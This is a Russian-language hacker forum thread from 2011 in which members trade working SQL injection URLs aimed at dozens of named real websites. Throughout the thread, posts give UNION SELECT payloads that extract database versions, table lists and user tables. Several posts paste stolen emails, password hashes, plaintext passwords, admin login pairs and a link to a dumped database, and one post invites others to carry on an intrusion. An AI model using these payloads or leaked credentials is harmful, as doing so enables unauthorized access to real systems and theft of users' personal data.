RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2011-03-27 19:31:42.686666
|
|
|
Steep type
Сообщений: 106
Оценки: 0
Присоединился: 2011-02-22 18:27:57.606666
|
Мне кажется будет лутше выкидывать вот так http://www.arwauniversity.org/sub_ar.php?s_id=-134 и кому надо те сами сделают..От школоты.
|
|
|
RE: Ваши Sql-инъекции - 2011-03-30 07:04:08.620000
|
|
|
Jamsho0T
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
|
quote:
http://www.arwauniversity.org/sub_ar.php?s_id=-134 http://www.arwauniversity.org/sub_ar.php?s_id=-134+union+select+1,@@version,3,4,5,6,7,8,9%20– user_name:user_pass: basem:1234: anwar:123: dr.waheeba:123:
|
|
|
RE: Ваши Sql-инъекции - 2011-03-30 14:04:17.856666
|
|
|
Jamsho0T
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
|
http://www.simeth.org/involved.php?_ID=-1+union+select+@@version%20– http://www.monoricenter.hu/merchant/myindex.php?_id=-1+union+select+1,@@version,3,4,5,6,7%20–
|
|
|
RE: Ваши Sql-инъекции - 2011-03-31 09:40:40.813333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.inspiringhomemag.com/v.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11-- ver>5
|
|
|
RE: Ваши Sql-инъекции - 2011-04-01 18:17:43.376666
|
|
|
Lord Reigan
Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
|
защита от школоты http://www.usclock.net/productdisplay.asp?cattype=c'+%20order%20by%2099&ccatID=9 http://www.hardtofindmusicandmovies.com/productdisplay.asp?idProduct=-1%20union%20select%201,2,3,4,5,6 )))
|
|
|
RE: Ваши Sql-инъекции - 2011-04-02 08:44:52.420000
|
|
|
Lord Reigan
Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
|
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+25,2– http://www.fowlgreenfarm.co.uk/admin/index.php - adminka DES(unix)-шифрование d.graham@mixd.co.uk:d6U0gZClBpERs: m.carter@mixd.co.uk:e4HQqdTIwT8x6:password p.shackleton@mixd.co.uk:f1w5IEt5Pbdjc: m.danford@mixd.co.uk:5dMVAAguoRx/g:password info@fowlgreenfarm.co.uk:d0bReI3ryaTzs:commondata Шел не смог залить так что дерзайте))))) Незабудет поставить мне +++ )))))
|
|
|
RE: Ваши Sql-инъекции - 2011-04-04 08:42:54.983333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.corporatedevelopmint.com/team.php
?ID=-1+UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- ver>5
|
|
|
RE: Ваши Sql-инъекции - 2011-04-04 21:12:46.110000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.inpe.br/noticias/noticia.php?Cod_Noticia=-2486+union+select+1,version(),3-- ver=>4[>:]
|
|
|
RE: Ваши Sql-инъекции - 2011-04-06 20:55:39.580000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.bfi.org.uk/features/tv/100/list/prog.php
?id=-2+UNION SELECT 1,2,3,4,5,group_concat(id,0x3a,firstname,0x3a,lastname,0x3a,address,0x3a,password,0x3a,email,0x3a,access_level,0x3a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+adm_users-- http://www.sa-rado.org/prog.php?id=-2%27+UNION%20SELECT%201,version(),3,4--+
|
|
|
RE: Ваши Sql-инъекции - 2011-04-08 22:35:01.250000
|
|
|
turyagaman
Сообщений: 26
Оценки: 0
Присоединился: 2011-03-05 07:05:19.046666
|
http://www.chiroachterolen.be/prog.php?ID=-2+UNION SELECT 1,group_concat(ID,0x2b,voornaam,0x2b,nick,0x2b,PASSWORD,0x2b),3+from+atomos_users-- 1 Ben Scott jowjow
|
|
|
RE: Ваши Sql-инъекции - 2011-04-11 23:00:28.703333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://manual.wpoonline.com/param.php?id=-20+union+select+1,2,^
|
|
|
RE: Ваши Sql-инъекции - 2011-04-12 20:05:21.493333
|
|
|
Jamsho0T
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
|
http://www.snowboardprofiles.com/pro.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20– бд - snowboardprofile слепая , кому надо крутите дальше
|
|
|
RE: Ваши Sql-инъекции - 2011-04-15 22:42:26.480000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.freepoc.de/viewapp.php?id=-12+UNION+SELECT+1,concat(user(),0x2d,database(),0x2d,version()),3,4,5,6,7,8--
|
|
|
RE: Ваши Sql-инъекции - 2011-04-24 12:04:30.320000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.attila-meerkamp.nl/trainer.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
http://www.hollyaiken.com/product.php?category=-27+union+select+1,version(),user(),4,5--
http://www.sparkwestnigeria.com/service.php?id=1&cat_id=-2+union+select+1,2,3--
|
|
|
RE: Ваши Sql-инъекции - 2011-04-25 17:18:08.176666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.ewrc.cz/ewrc/show.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database())--
- в заголовке. http://www.cssbeauty.com/jobs/show.php?id=-376+union+select+concat_ws(0x3a,username,password,email)+from+ek_users--
|
|
|
RE: Ваши Sql-инъекции - 2011-04-26 10:48:37.336666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.nswfb.nsw.gov.au/list.php?id=-43+union+select+1,2,3,4,5,6,7,group_concat%280x3a,table_name%29,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables--
в табличках ничего интересного нет.
|
|
|
RE: Ваши Sql-инъекции - 2011-04-26 18:25:46.516666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://central-media.ru/post.php?id=-1+union+select+1,2,3,concat_ws%280x3a,login,password,email%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+persons--
Дамп базы: http://pastehtml.com/view/1e8wum8.html
|
|
|
RE: Ваши Sql-инъекции - 2011-04-27 16:50:43.050000
|
|
|
Relapse
Сообщений: 7
Оценки: 0
Присоединился: 2010-04-04 23:49:35.526666
|
http://2012.net:80/?channel=endoftheworld Через Havij прет отлично =)
|
|
|
RE: Ваши Sql-инъекции - 2011-04-29 11:36:57.706666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.pakistangrocery.com/product-view.php?productID=-1+UNION+SELECT+version(),2,3 http://www.dmelbsb.com.sg/product-view.php?id=-1+UNION+SELECT+1,2,3,4,version(),6,7,8+--+ http://www.7days.ae/newslist.php?start=100&cat=-1'+UNION+SELECT+1,version(),3,4+--+ <–Интересный сайт, добрался до админки слил всю базу(есть даже кнопка скачать в xls =) ), пароль админа хранился в открытом виде, после того как меня спалили(день назад) в md5 root;e10adc3141ba59abbe56e027f20f818b http://www.wilmers.co.ke/buycars.php?page=104&bоdуstyle=&make=130&model='+/*!UNION*/+SELECT+1,2,version()+--+ http://www.bambooplantsonline.com/index.php?&cat=-1'+/*!UNION*/+SELECT+1,2,3,version(),5,6,7,8+--+&page=4
|
|
|
RE: Ваши Sql-инъекции - 2011-05-02 15:26:41.530000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.racingandsports.com.au/racing/rsnewsart.asp?NID=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76+--+
|
|
|
RE: Ваши Sql-инъекции - 2011-05-03 18:34:36.860000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.kupi-tam.com/catalog.php?id=145+and+1=0+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20&id2=147&id3=150 http://www.buycat.ru/albom.php?n=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+&foto=1&o=1&alk=1 <– этот сайт создан сектой криворуких кодеров:D Заходим на их сайт 100gig.com, потом в раздел "Наши работы", там смотрим если в списке технологий есть MySQL значит сайт уязвим.
|
|
|
RE: Ваши Sql-инъекции - 2011-05-05 14:13:01.896666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.expoalta.com.br/2003/n.php?id=-1+UNION SELECT 1,2,^,4,5,6
|
|
|
RE: Ваши Sql-инъекции - 2011-05-05 19:19:24.850000
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.subdecay.com/product.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - в заголовке. http://www.cyberbody.ru/product.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- http://www.cyberbody.ru/product.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.tables+where+table_schema=0x753232373534--
|
|
|
RE: Ваши Sql-инъекции - 2011-05-05 19:56:51.450000
|
|
|
dannote
Сообщений: 5
Оценки: 0
Присоединился: 2011-05-05 19:16:50.633333
|
Обычные: http://www.zou.ru/popup0.php?id=1632+limit+0+union+select+concat_ws(0x3a,user(),version(),database()),2,3 http://nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 http://www.intline.ru/forum.php?confoid=1+limit+0+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4–+ http://unitedagainstracism.org/pages/detail.php?orgID=1+limit+0+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 Blind: http://www.cbr.ru/regions/RKC.asp?RGN=SP-G'+and+1=1–+ http://www.cbr.ru/regions/RKC.asp?RGN=SP-G'+and+1=2–+
|
|
|
RE: Ваши Sql-инъекции - 2011-05-06 20:07:21.883333
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.stateart.com/works.php?workId=-1+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14+--+ http://www.casatuscany.com/buy/details.php?id=-1+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73+--+
|
|
|
RE: Ваши Sql-инъекции - 2011-05-09 17:48:46.533333
|
|
|
Jamsho0T
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
|
http://store-apple.ru/catalog.htm?parent_id=-8 blind крутите сами ver 5 бд - muhin_apple если можно скиньте в личку хороший гайд по слепым
|
|
|
RE: Ваши Sql-инъекции - 2011-05-09 20:54:55.243333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
quote:
ORIGINAL: Jamsho0T если можно скиньте в личку хороший гайд по слепым Советую юзать для слепых софт, вот например хорошая тулза, сильно облегчает подбор биндов.
|
|
|
RE: Ваши Sql-инъекции - 2011-05-10 09:36:50.366666
|
|
|
Lord Reigan
Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
|
http://www.pathword.kz/index.php?strid=1&fullnews=-1+union+select+1,2,3,4,5,6–+ кто раскрутит подгоните бд.
|
|
|
RE: Ваши Sql-инъекции - 2011-05-14 11:54:15.993333
|
|
|
GaMeSTeR_04reg
Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
|
http://www.ccp.si/english/izpis.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26+--+ http://www.phoenixfilmfestival.org/pages/contact.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+ http://www.dracoders.com/games.php?id=-1+/*!UNION*/+SELECT+1,2,3,4,version()+--+
|
|
|
RE: Ваши Sql-инъекции - 2011-05-17 18:34:38.920000
|
|
|
Lord Reigan
Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
|
http://www.aarviencon.com/detail1.php?id=-57+/*!union*/+select+1,table_name,3,4,5+from+information_schema.tables– http://www.sou-cakovice.cz/detail1.php?id=-1+union/*&lang=*/select+1,2,3,4,5+table_name+information_schema.columns–+
|
|
|
RE: Ваши Sql-инъекции - 2011-05-18 22:58:07.700000
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
http://eromania.ru/main.php?grp=46' Вообщем, чет я запутался тут … =( Через ордер или груп показывает , что больше либо равно 2 но меньше чем 3… в union+select просит еще вводить столбцы .
|
|
|
RE: Ваши Sql-инъекции - 2011-05-19 19:27:57.476666
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
http://yogacenter.ru/page.php?id=5' http://www.ipf-light.ru/shop/index.php?categoryID=56'–+)* http://www.donballon.ru/shop/index.php?id_group=5 http://crazymama.ru/name.php?id_name=221' http://www.joe-weider.ru/shop.php?op=product&productid=4 http://www.stitchshop.ru/shop/index.php?id=1 http://www.dunloptyres.ru/tyre.php?id=-87' http://intim-shop.kh.ua/index.php?module=products&view=product&product_id=5' http://shops.ixi.ua/shop.php?25'+limit+0/+/group+by+50–/ http://ekipirovka.ru/catalog.php?type=5'
|
|
|
RE: Ваши Sql-инъекции - 2011-05-20 10:04:40.630000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.hotels.net411.com/info.php?id=-00012+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
|
|
|
RE: Ваши Sql-инъекции - 2011-05-23 08:01:38.080000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.thenichecondo.com/progresshk.php?prog_id=-3 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14 http://www.aaj.tv/kag/segments.php?prog_id=-3 UNION SELECT 1,2,3,4,group_concat(user_id,0x2a,user_name,0x2a,user_password),6,7,8 from users
|
|
|
RE: Ваши Sql-инъекции - 2011-05-23 11:18:29.950000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.lcwu.edu.pk/prog_detail.php?prog_id=-3%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16 http://swamisita.com/programs/index.php?prog_id=-3' UNION SELECT @@version,2,3,4,5
|
|
|
RE: Ваши Sql-инъекции - 2011-05-25 00:24:50.343333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.sonymusic.cz/lr-aktuality.php?rid=1&cid='&article=beyonce-4 дальше дело за LulzSec [sm=dont.gif]
|
|
|
RE: Ваши Sql-инъекции - 2011-05-26 22:24:58.613333
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
http://www.viamontenapoleone.org/admin kiran@kiran.com abc@123
|
|
|
RE: Ваши Sql-инъекции - 2011-05-27 10:29:50.586666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
quote:
ORIGINAL: sepo http://www.sonymusic.cz/lr-aktuality.php?rid=1&cid='&article=beyonce-4 дальше дело за LulzSec [sm=dont.gif] http://www.sonypictures.ru/homevideo/DVDpage.php?dvdId=67' Согласен
|
|
|
RE: Ваши Sql-инъекции - 2011-05-28 00:11:48.880000
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
user=admin pass=giannistaff http://www.giannistaffparrucchieri.it/admin/login.php
|
|
|
RE: Ваши Sql-инъекции - 2011-05-30 00:02:08.083333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.atlanticchemical.com/product.php?pid=-1+union+select+1,2,group_concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13+from+users
|
|
|
|
|